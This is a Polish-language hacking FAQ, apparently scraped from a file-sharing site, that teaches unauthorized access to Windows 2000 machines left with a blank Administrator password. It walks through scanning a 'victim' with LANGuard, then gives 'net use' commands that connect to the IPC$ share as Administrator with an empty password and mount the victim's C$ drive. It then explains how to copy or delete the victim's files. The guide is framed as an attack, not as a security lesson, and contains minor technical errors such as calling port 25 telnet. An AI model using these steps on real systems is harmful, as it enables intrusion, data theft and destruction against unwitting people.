Puste hasło admina, Uczelnia, Systemy operacyjne


Puste hasło admina ...


######  #    # ##### ###### ###  ### # #######
#            #    # #         #        # #   ##   # #       #
######  #### ####   ###### #          # #       #
          #   #    #  #       # ###    #          # #       #
######  #    # ##### #   ###  #          # #       #

###### ##### #####
#           #      # #      #
#####   ##### #      #
#           #      # #  #  #
#           #      # #####
                              #

na temat : Puste hasło admina ...

W FAQ :

1. Wstęp.
2. Skanujemy ofiare.
3. Udostępniamy dysk u ofiary.
4. Zakończenie.

Ad.1
Witam !!! Chciałem tylko powiedzieć na czym polega FAQ : przy instalacji systemu Windows (Winshit) człowiek nie patrzy i nie podaje hasła do użytkownika Administrator (puste hasło admina) czyli zostawia po prostu puste hasło. A co nam to daje ?? Możemy się zalogować jako Administrator bez podawania hasła i uzyskać zdalny dostęp do komputera z poziomu roota. Puste hasło admina (o ile mi się zdaje) działa tylko na systemach Win2k.

Co będzie nam potrzebne :

- Windows 2k Professional
- LANGuard Network Scanner
- NetCat

Ad.2
Gdy już ściągnięmy program LANGuard Network Scanner, uruchamiamy go. W polu 'Target :' wpisujemy numer IP naszej ofiary, którą chcemy przeskanować. Naciskamy Enter i ciągniemy.

W polu poniżej wyskakuje nam takie coś :

[+] 192.168.??.?? [NAZWA_ZALOGOWANEGO_USERA] (Windows 2000)

Naciskamy [+] i mamy tam takie coś :

[+] 192.168.??.?? [NAZWA_ZALOGOWANEGO_USERA] (Windows 2000)
   
  [+] NETBIOS names (5)
  [+] Username : lamer (lamer to nazwa zalogowanego użyszkodnika)
  [+] MAC : 00-E0-7d-??-??-?? [nazwa_karty_sieciowej] (Adres MAC, czyli adres karty sieciowej)
  [+] Time to live (TTL) : 128 (128) - Same network segment (jakiś czas długości, a dokładnie to nie wiem)
  [+] LAN Manager : Windows 2000 LAN Manager (Na czym chodzi sieć LAN, chyba)
  [+] Domain : WORKGROUP (Grupa robocza, do której komputer jest podłączony)

[+] Open Ports (Tu wyskoczą nam otwarte porty)
   
  [+] np. CAFEiNI (51966) (porty przez które możemy się zalogować)
  [+] telnet (25) (j.w.)

Spisujemy sobie gdzieś to na kartce etc.

Ad.3
Teraz włączamy program NetCat (w wierszu polecenia albo 'Tryb MS-DOS'). Przechodzimy do folderu z NetCat'em i wpisujemy :

D:\[folder z netcatem]>net use \\adres.ip.naszej.ofiary\ipc$ "" /u:Administrator(domyślna nazwa admina, jak znamy ofiare to po próbujmy też inne rzeczy np. jego imie itp.)
Naciskamy Enter. Gdy wyskoczy nam coś takiego :

Wystąpił błąd systemu 1326.

Błąd logowania.

To znaczy, że konto roota ma inną nazwe. Teraz wpiszmy zamiast Administrator, nazwę

'lamer'. Czyli będzie to tak wyglądać :

D:\[folder z netcatem]>net use \\adres.ip.naszej.ofiary\ipc$ "" /u: lamer

Naciskamy Enter, jeśli wyskoczy nam coś takiego :

Polecenie zostało wykonane pomyślnie.

To znaczy, że właśnie możemy się zalogować na tym komputerze jako administrator, czyli na konto roota. Ale my nie będziemy się logować, tylko udostępnimy sobie pliki od ofiary :

D:\[folder z netcatem]>net use d:[nazwa dysku] \\adres.ip.naszej.ofiary\c$

Naciskamy enter. Jeśli wyskoczyło nam coś takiego :

Polecenie zostało wykonane pomyślnie.

to znaczy, że już możemy sobie wejść na dysk naszej ofiary i ściągać od niej wszystkie interesujące nas dane. Aby to zrobić wchodzimy na 'Mój komputer' i tam mamy już coś takiego :

Dyski sieciowe :

[+] c$ na "adres.ip.naszej.ofiary" (D:)

i po prostu klikamy dwa razy myszką na ten dysk i po chwili mamy w normalnym windowsowym okienku wszystkie dane u naszej ofiary.

Jeśli chcemy coś wykasować to po prostu klikamy na plik i : prawy przycisk myszy -> usuń
System nam na to pozwoli, ponieważ jesteśmy administratorem na tym komputerze. A jeśli chcemy skopiować to tak samo tylko kopiujemy z dysku sieciowego na swój dysk twardy.

Ad.4
Na zakończeniu chciałem powiedzieć, co zrobić aby zerwać połączenie. No więc piszemy tak samo jak udostępnialiśmy dysk :

D:\[folder z netcatem]>net use * /del /y

Wyskoczy nam takie coś :

Masz następujące połączenie zdalne :

   D:             \\adres.ip.naszej.ofiary
                   \\adres.ip.naszej.ofiary
Kontynuowanie działania spowoduje anulowanie tych połączeń.

Gdy naciśniemy enter wyskoczy nam (jak zwykle zresztą) :

Polecenie zostało wykonane pomyślnie.

Wtedy nie będziemy mieć już dostępu do tego dysku.



Wyszukiwarka

Podobne podstrony:
dos, Uczelnia, Systemy operacyjne
Pliki wsadowe dos, Uczelnia, Systemy operacyjne
quota, !!!Uczelnia, wsti, materialy, II SEM, systemy operacyjne linux
egzamin systemy oper, !!!Uczelnia, wsti, materialy, I SEM, systemy operacyjne windows, egzamin
systemy operacyjne egzamin pytania-odpowiedzi, !!!Uczelnia, wsti, materialy, II SEM
quota, !!!Uczelnia, wsti, materialy, II SEM, systemy operacyjne linux
Systemy operacyjne
5 Systemy Operacyjne 23 11 2010 Zarządzanie procesami
zasady grupy, java, javascript, oprogramowanie biurowe, programowanie, programowanie 2, UTK, systemy
Systemy Operacyjne lab4, Politechnika Wrocławska, Systemy Operacyjne
format[1], Szkoła, Systemy Operacyjnie i sieci komputerowe, systemy, semestr I
System plików, zOthers, Systemy operacyjne i sieci komputerowe
Rafał Polak 12k2 lab8, Inżynieria Oprogramowania - Informatyka, Semestr III, Systemy Operacyjne, Spr
System operacyjny
01 Systemy Operacyjne ppt
12 wspomaganie systemu operacyjnego pamiec wirtualna
Pytania do egzaminu z Systemow Operacyjnych cz, EdukacjaTEB

więcej podobnych podstron